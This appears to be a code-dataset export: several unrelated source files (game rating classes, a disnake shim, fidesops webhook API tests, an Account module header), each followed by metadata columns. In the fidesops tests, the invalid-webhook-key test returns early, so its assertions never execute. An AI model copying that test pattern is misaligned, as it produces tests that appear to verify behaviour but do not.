class NA_Azir_Sup_Taric(Ratings):
pass
class NA_Azir_Sup_Teemo(Ratings):
pass
class NA_Azir_Sup_Thresh(Ratings):
pass
class NA_Azir_Sup_Tristana(Ratings):
pass
class NA_Azir_Sup_Trundle(Ratings):
pass
class NA_Azir_Sup_Tryndamere(Ratings):
pass
class NA_Azir_Sup_TwistedFate(Ratings):
pass
class NA_Azir_Sup_Twitch(Ratings):
pass
class NA_Azir_Sup_Udyr(Ratings):
pass
class NA_Azir_Sup_Urgot(Ratings):
pass
class NA_Azir_Sup_Varus(Ratings):
pass
class NA_Azir_Sup_Vayne(Ratings):
pass
class NA_Azir_Sup_Veigar(Ratings):
pass
class NA_Azir_Sup_Velkoz(Ratings):
pass
class NA_Azir_Sup_Vi(Ratings):
pass
class NA_Azir_Sup_Viktor(Ratings):
pass
class NA_Azir_Sup_Vladimir(Ratings):
pass
class NA_Azir_Sup_Volibear(Ratings):
pass
class NA_Azir_Sup_Warwick(Ratings):
pass
class NA_Azir_Sup_Xayah(Ratings):
pass
class NA_Azir_Sup_Xerath(Ratings):
pass
class NA_Azir_Sup_XinZhao(Ratings):
pass
class NA_Azir_Sup_Yasuo(Ratings):
pass
class NA_Azir_Sup_Yorick(Ratings):
pass
class NA_Azir_Sup_Zac(Ratings):
pass
class NA_Azir_Sup_Zed(Ratings):
pass
class NA_Azir_Sup_Ziggs(Ratings):
pass
class NA_Azir_Sup_Zilean(Ratings):
pass
class NA_Azir_Sup_Zyra(Ratings):
pass
| 15.033573
| 46
| 0.75642
| 972
| 6,269
| 4.452675
| 0.151235
| 0.223198
| 0.350739
| 0.446396
| 0.791359
| 0.791359
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177221
| 6,269
| 416
| 47
| 15.069712
| 0.839085
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
db6c4d381e9f4547166f0ede186c81f6c565217d
| 128
|
py
|
Python
|
discord/ui/select.py
|
kuzaku-developers/disnake
|
61cc1ad4c2bafd39726a1447c85f7e469e41af10
|
[
"MIT"
] | null | null | null |
discord/ui/select.py
|
kuzaku-developers/disnake
|
61cc1ad4c2bafd39726a1447c85f7e469e41af10
|
[
"MIT"
] | null | null | null |
discord/ui/select.py
|
kuzaku-developers/disnake
|
61cc1ad4c2bafd39726a1447c85f7e469e41af10
|
[
"MIT"
] | null | null | null |
from disnake.ui.select import *
from disnake.ui.select import __dict__ as __original_dict__
locals().update(__original_dict__)
| 25.6
| 59
| 0.828125
| 18
| 128
| 5.111111
| 0.555556
| 0.23913
| 0.282609
| 0.413043
| 0.543478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 128
| 4
| 60
| 32
| 0.793103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
dbc53aae7bd76504e9ea569c7bf00475fc600cf4
| 34,588
|
py
|
Python
|
tests/api/v1/endpoints/test_policy_webhook_endpoints.py
|
eastandwestwind/fidesops
|
93e2881c0fdc30075b7cc22024965d18cec0bdea
|
[
"Apache-2.0"
] | 41
|
2021-11-01T23:53:43.000Z
|
2022-03-22T23:07:56.000Z
|
tests/api/v1/endpoints/test_policy_webhook_endpoints.py
|
eastandwestwind/fidesops
|
93e2881c0fdc30075b7cc22024965d18cec0bdea
|
[
"Apache-2.0"
] | 235
|
2021-11-01T20:31:55.000Z
|
2022-03-31T15:40:58.000Z
|
tests/api/v1/endpoints/test_policy_webhook_endpoints.py
|
eastandwestwind/fidesops
|
93e2881c0fdc30075b7cc22024965d18cec0bdea
|
[
"Apache-2.0"
] | 12
|
2021-11-02T00:44:51.000Z
|
2022-03-14T16:23:10.000Z
|
import json
from typing import Dict
import pytest
from fidesops.api.v1.scope_registry import (
WEBHOOK_READ,
WEBHOOK_CREATE_OR_UPDATE,
POLICY_READ,
WEBHOOK_DELETE,
)
from fidesops.api.v1.urn_registry import (
V1_URL_PREFIX,
POLICY_WEBHOOKS_PRE,
POLICY_WEBHOOKS_POST,
POLICY_PRE_WEBHOOK_DETAIL,
POLICY_POST_WEBHOOK_DETAIL,
)
from fidesops.models.connectionconfig import ConnectionConfig
from fidesops.models.policy import PolicyPreWebhook, PolicyPostWebhook
from tests.api.v1.endpoints.test_privacy_request_endpoints import stringify_date
def embedded_http_connection_config(connection_config: ConnectionConfig) -> Dict:
"""Helper to reduce clutter - a lot of the tests below assert the entire response body, which includes the
https connection config"""
return {
"name": connection_config.name,
"key": connection_config.key,
"connection_type": "https",
"access": connection_config.access.value,
"created_at": stringify_date(connection_config.created_at),
"updated_at": stringify_date(connection_config.updated_at),
"last_test_timestamp": None,
"last_test_succeeded": None,
}
class TestGetPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_get_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_pre_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "pre_execution_two_way_webhook",
"name": policy_pre_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPostExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_get_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_post_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "one_way",
"key": "cleanup_webhook",
"name": policy_post_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPreExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_get_pre_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_pre_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_pre_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Pre-Execution Webhook found for key 'pre_execution_one_way_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestGetPolicyPostExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_get_post_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_post_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_post_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Post-Execution Webhook found for key 'cache_busting_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestPutPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
"key": "poke_snowflake_webhook",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_put_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, valid_webhook_request
):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(url, headers=auth_header, json=[valid_webhook_request])
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_invalid_connection_config(
self, db, url, api_client, generate_auth_header, valid_webhook_request
):
invalid_connection_config_body = {
"connection_config_key": "unknown_connection_key",
"direction": "one_way",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No connection configuration found with key 'unknown_connection_key'."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_direction_error_fails_all(
self,
db,
https_connection_config,
generate_auth_header,
api_client,
url,
valid_webhook_request,
):
invalid_connection_config_body = {
"connection_config_key": https_connection_config.key,
"direction": "invalid_direction",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 422
body = json.loads(resp.text)
assert (
body["detail"][0]["msg"]
== "value is not a valid enumeration member; permitted: 'one_way', 'two_way'"
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_keys(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, valid_webhook_request],
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
name_only = {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
}
resp = api_client.put(
url, headers=auth_header, json=[valid_webhook_request, name_only]
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_names(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
second_payload = valid_webhook_request.copy()
second_payload["key"] = "new_key"
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, valid_webhook_request],
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
def test_create_multiple_pre_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Pre Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "poke_snowflake_webhook",
"name": "Poke Snowflake Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_pre_execution_webhook",
"name": "My Pre Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
pre_webhooks = PolicyPreWebhook.filter(
db=db,
conditions=(
PolicyPreWebhook.key.in_(
["my_pre_execution_webhook", "poke_snowflake_webhook"]
)
),
)
assert pre_webhooks.count() == 2
for webhook in pre_webhooks:
webhook.delete(db=db)
def test_update_webhooks_reorder(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
assert policy_pre_execution_webhooks[0].key == "pre_execution_one_way_webhook"
assert policy_pre_execution_webhooks[0].order == 0
assert policy_pre_execution_webhooks[1].key == "pre_execution_two_way_webhook"
assert policy_pre_execution_webhooks[1].order == 1
# Flip the order in the request
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[1].direction.value,
"name": policy_pre_execution_webhooks[1].name,
"key": policy_pre_execution_webhooks[1].key,
},
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert body[0]["key"] == "pre_execution_two_way_webhook"
assert body[0]["order"] == 0
assert body[1]["key"] == "pre_execution_one_way_webhook"
assert body[1]["order"] == 1
def test_update_hooks_remove_hook_from_request(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
# Only include one hook
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert len(body) == 1 # Other webhook was removed
assert body[0]["key"] == "pre_execution_one_way_webhook"
assert body[0]["order"] == 0
class TestPutPolicyPostExecutionWebhooks:
"""Shares a lot of logic with Pre Execution Webhooks - see TestPutPolicyPreExecutionWebhooks tests"""
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Clear App Cache",
"key": "clear_app_cache",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_put_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_create_multiple_post_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Post Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "clear_app_cache",
"name": "Clear App Cache",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_post_execution_webhook",
"name": "My Post Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
post_webhooks = PolicyPostWebhook.filter(
db=db,
conditions=(
PolicyPostWebhook.key.in_(
["my_post_execution_webhook", "clear_app_cache"]
)
),
)
assert post_webhooks.count() == 2
for webhook in post_webhooks:
webhook.delete(db=db)
class TestPatchPreExecutionPolicyWebhook:
"""Test updating a single PolicyPreWebhook - however, updates to "order" can affect the orders of other webhooks"""
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_patch_pre_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_pre_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_patch_pre_execution_webhook_invalid_webhook_key(
self, api_client, generate_auth_header, policy
):
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key="invalid_webhook_key"
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 404
def test_path_pre_execution_webhook_invalid_order(
self, generate_auth_header, api_client, url, policy_pre_execution_webhooks
):
request_body = {"order": 5}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 400
response_body = json.loads(resp.text)
assert (
response_body["detail"]
== "Cannot set order to 5: there are only 2 PolicyPreWebhook(s) defined on this Policy."
)
def test_update_name_only(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook"}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
"new_order": [],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
assert webhook.order == 0
def test_update_name_and_order(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook", "order": 1}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "pre_execution_two_way_webhook", "order": 0},
{"key": "pre_execution_one_way_webhook", "order": 1},
],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 1
class TestPatchPostExecutionPolicyWebhook:
"""Test updating a single PolicyPostWebhook - however, updates to "order" can affect the orders of other webhooks
This endpoint shares code with the pre-execution PATCH - see TestPatchPreExecutionPolicyWebhook
"""
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_patch_post_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_post_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_update_name_and_order_and_direction(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
webhook = PolicyPostWebhook.filter(
db=db, conditions=(PolicyPostWebhook.key == "cache_busting_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 0
request_body = {
"name": "Better Webhook Name",
"order": 1,
"direction": "two_way",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "two_way",
"key": "cache_busting_webhook",
"name": "Better Webhook Name",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "cleanup_webhook", "order": 0},
{"key": "cache_busting_webhook", "order": 1},
],
}
db.refresh(webhook)
assert webhook.order == 1
class TestDeletePolicyPreWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_delete_pre_execution_webhook(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_pre_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_pre_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_pre_execution_webhooks[1].key, "order": 0}]
}
assert policy.pre_execution_webhooks.count() == 1
class TestDeletePolicyPostWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_delete_pre_execution_webhook(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_post_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_post_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_post_execution_webhooks[1].key, "order": 0}]
}
assert policy.post_execution_webhooks.count() == 1
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[1].key,
)
resp = api_client.delete(
url,
headers=auth_header,
)
body = json.loads(resp.text)
assert body == {"new_order": []}
assert policy.post_execution_webhooks.count() == 0
| 34.41592
| 123
| 0.608766
| 3,754
| 34,588
| 5.235482
| 0.055674
| 0.074285
| 0.065941
| 0.045792
| 0.869594
| 0.858604
| 0.837489
| 0.809352
| 0.785387
| 0.777653
| 0
| 0.010393
| 0.304556
| 34,588
| 1,004
| 124
| 34.450199
| 0.806685
| 0.020816
| 0
| 0.73702
| 0
| 0
| 0.107485
| 0.032044
| 0
| 0
| 0
| 0
| 0.108352
| 1
| 0.066591
| false
| 0
| 0.009029
| 0.013544
| 0.102709
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91b9f9c07904975ec550367163348446c811df03
| 106,439
|
py
|
Python
|
Account/app/mod_account/view_api.py
|
mydata-sdk/mydata-sdk-1.x
|
74064d7a42fc0435511eae6e77e49ddc7d9723f3
|
[
"MIT"
] | null | null | null |
Account/app/mod_account/view_api.py
|
mydata-sdk/mydata-sdk-1.x
|
74064d7a42fc0435511eae6e77e49ddc7d9723f3
|
[
"MIT"
] | 2
|
2018-04-21T04:09:46.000Z
|
2018-04-30T21:54:09.000Z
|
Account/app/mod_account/view_api.py
|
fititnt/mydata-sdk--hiit
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Import dependencies
import json
import uuid
import logging
